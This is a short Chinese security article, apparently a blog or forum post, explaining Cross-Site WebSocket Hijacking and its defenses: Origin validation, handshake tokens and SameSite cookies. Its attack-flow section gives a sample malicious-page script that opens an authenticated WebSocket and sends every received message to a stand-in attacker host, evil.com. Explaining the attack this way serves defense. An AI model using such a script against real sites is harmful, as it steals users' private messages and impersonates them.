|
WebSocket劫持(CSWSH)——实时通信的CSRF变种 摘要:跨站WebSocket劫持(Cross-Site WebSocket Hijacking, CSWSH)类似于CSRF,攻击者在恶意网页中建立WebSocket连接到目标站点,利用用户的已认证Cookie模拟操作。由于WebSocket可以发送和接收消息,黑客可能读取服务器推送的敏感数据或向服务器发送恶意指令。本文讲解CSWSH原理及防御:验证Origin头、使用随机Token。 关键词:黑客网站攻击;WebSocket劫持;CSWSH;渗透测试;实时通信安全
一、引言WebSocket提供全双工通信,常用于聊天、游戏、金融报价。与HTTP不同,WebSocket没有同源策略的自然限制,但握手阶段使用HTTP Upgrade,因此受到Origin头、Cookie等约束。如果服务器不校验Origin(或信任任意Origin),黑客可诱导用户浏览器连接至目标WebSocket端点,读取/发送消息。 二、CSWSH攻击流程用户登录目标网站example.com,获得会话Cookie。 黑客创建恶意站点evil.com,其中JavaScript: [size=12.573px]javascript
var ws = new WebSocket("wss://example.com/chat");ws.onmessage = function(m) { fetch('https://evil.com/log?data='+m.data); };ws.send("恶意消息");
用户访问evil.com,浏览器建立WebSocket连接时自动携带example.com的Cookie。 若服务器未验证Origin头,连接成功,黑客可窃听对话或冒充用户发送消息。
三、危害窃取聊天记录、实时数据流。 发送欺诈消息或触发服务器端逻辑(如转账指令)。 与HTTP上的CSRF类似,但具有双向特性。
四、防御措施验证Origin头:确保Origin值与服务器域名匹配。 使用一次性Token(类似CSRF Token):在WebSocket握手URL中加上随机Token,验证通过后方可建立连接。 Cookie设置SameSite=Lax/Strict:限制跨站请求携带Cookie。 使用wss://加密:虽不能防御劫持,但可防止中间人修改。
五、检测方法手工测试:在浏览器控制台尝试连接目标WebSocket,如果成功且能接收消息,则存在漏洞。 六、总结WebSocket劫持是容易被忽视的漏洞。防御核心同CSRF:验证Origin和Token。
| 
发表于 
收藏
